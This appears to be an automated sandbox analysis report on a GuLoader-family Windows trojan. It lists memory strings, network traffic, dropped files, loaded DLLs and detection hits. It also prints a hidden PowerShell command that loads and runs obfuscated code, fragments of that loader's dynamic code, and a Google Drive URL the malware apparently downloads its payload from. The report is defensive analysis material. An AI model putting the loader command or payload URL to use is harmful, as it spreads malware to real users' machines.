Source: msiexec.exe, 00000007.00000002.3037606643.0000000009624000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2833538108.000000000963D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000001.00000002.2698155602.0000000005E7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.2698155602.0000000005E7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.2698155602.0000000005E7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: msiexec.exe, 00000007.00000002.3037606643.00000000095CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: msiexec.exe, 00000007.00000002.3037606643.00000000095CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1tTuCtWc8QWxmudjTRrFkrhq7MJC0UzWJ
Source: msiexec.exe, 00000007.00000002.3037606643.0000000009639000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: msiexec.exe, 00000007.00000002.3037606643.0000000009639000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/4
Source: msiexec.exe, 00000007.00000002.3037606643.0000000009639000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/:
Source: msiexec.exe, 00000007.00000002.3037606643.000000000960D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2833538108.000000000963D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1tTuCtWc8QWxmudjTRrFkrhq7MJC0UzWJ&export=download
Source: msiexec.exe, 00000007.00000002.3037606643.0000000009624000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1tTuCtWc8QWxmudjTRrFkrhq7MJC0UzWJ&export=download.
Source: powershell.exe, 00000001.00000002.2693602382.0000000004F66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.2698155602.0000000005E7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: msiexec.exe, 00000007.00000002.3052249542.000000002534E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.000000002539E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.00000000253BA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.00000000253AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: msiexec.exe, 00000007.00000002.3052249542.00000000253AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: msiexec.exe, 00000007.00000002.3052249542.000000002534E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.000000002539E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.00000000253BA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.00000000253AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: msiexec.exe, 00000007.00000002.3037606643.0000000009624000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2833538108.000000000963D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: msiexec.exe, 00000007.00000003.2833538108.0000000009632000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2833538108.000000000963D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.google.com/translate_a/element.js
Source: msiexec.exe, 00000007.00000003.2833538108.0000000009632000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2833538108.000000000963D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
Source: msiexec.exe, 00000007.00000003.2833538108.0000000009632000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2833538108.000000000963D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: msiexec.exe, 00000007.00000002.3037606643.0000000009624000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2833538108.000000000963D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: msiexec.exe, 00000007.00000002.3037606643.0000000009624000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2833538108.000000000963D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: msiexec.exe, 00000007.00000002.3037606643.0000000009624000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2833538108.000000000963D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: msiexec.exe, 00000007.00000002.3037606643.0000000009624000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2833538108.000000000963D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown	Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown	Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50008 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown	Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50020 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50006 -> 443

Source: unknown	HTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:50002 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.4:50003 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50021 version: TLS 1.2

Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe

Code function: 0_2_004052EE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004052EE

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer\4Vx2rUlb0f.exe

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe

Code function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_004032A0

Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe	File created: C:\Windows\resources\0809	Jump to behavior
Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe	File created: C:\Windows\resources\0809\relegationen	Jump to behavior
Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe	File created: C:\Windows\resources\0809\relegationen\ernringseksperternes	Jump to behavior

Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe	Code function: 0_2_00407040	0_2_00407040
Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe	Code function: 0_2_00406869	0_2_00406869
Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe	Code function: 0_2_00404B2B	0_2_00404B2B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_02FED278	7_2_02FED278
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_02FE5362	7_2_02FE5362
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_02FEC146	7_2_02FEC146
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_02FEC738	7_2_02FEC738
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_02FEC468	7_2_02FEC468
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_02FECA08	7_2_02FECA08
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_02FEE988	7_2_02FEE988
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_02FECFAA	7_2_02FECFAA
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_02FECCD8	7_2_02FECCD8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_02FE7118	7_2_02FE7118
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_02FE3AA1	7_2_02FE3AA1
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_02FE29EC	7_2_02FE29EC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_02FE39ED	7_2_02FE39ED
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_02FEE97A	7_2_02FEE97A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_02FE3E09	7_2_02FE3E09
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_02FE9DE0	7_2_02FE9DE0

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\nsr8170.tmp\nsExec.dll EE052FD5141BF769B841846170AABF0D7C2BB922C74C623C3F109344534F7A70

Source: 4Vx2rUlb0f.exe, 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmp

Binary or memory string: OriginalFilenamelinkeditor.exeDVarFileInfo$ vs 4Vx2rUlb0f.exe

Source: 4Vx2rUlb0f.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.evad.winEXE@6/13@5/5

Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe

0_2_004032A0

Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe

Code function: 0_2_004045AF GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004045AF

Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe

Code function: 0_2_00402095 CoCreateInstance,

0_2_00402095

Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe

File created: C:\Users\user\AppData\Local\neoimpressionism

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7584:120:WilError_03
Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: NULL

Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe

File created: C:\Users\user\AppData\Local\Temp\nsr8037.tmp

Jump to behavior

Source: 4Vx2rUlb0f.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process

Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 4Vx2rUlb0f.exe	Virustotal: Detection: 75%
Source: 4Vx2rUlb0f.exe	ReversingLabs: Detection: 65%

Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe

File read: C:\Users\user\Desktop\4Vx2rUlb0f.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\4Vx2rUlb0f.exe "C:\Users\user\Desktop\4Vx2rUlb0f.exe"
Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Baarebukets=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer\prelusory.Tuk206';$Figura=$Baarebukets.SubString(29776,3);.$Figura($Baarebukets) "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Baarebukets=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer\prelusory.Tuk206';$Figura=$Baarebukets.SubString(29776,3);.$Figura($Baarebukets) "	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior

Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 4Vx2rUlb0f.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \System.Core.pdb-2X3 source: powershell.exe, 00000001.00000002.2705239061.00000000085FC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: s\System.Core.pdb source: powershell.exe, 00000001.00000002.2705239061.00000000085FC000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000001.00000002.2706856166.000000000A8B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Anlgsbidragenes $Clockings $Lenstid), (Eutheria @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Andelsvirksomheden = [AppDomain]::CurrentDomain.GetAssembli
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Udbrydere)), $Overreservedly).DefineDynamicModule($Sneakbox, $false).DefineType($Forhandlingsvante, $Cometology, [System.MulticastDele

Suspicious powershell command line found

Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Baarebukets=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer\prelusory.Tuk206';$Figura=$Baarebukets.SubString(29776,3);.$Figura($Baarebukets) "
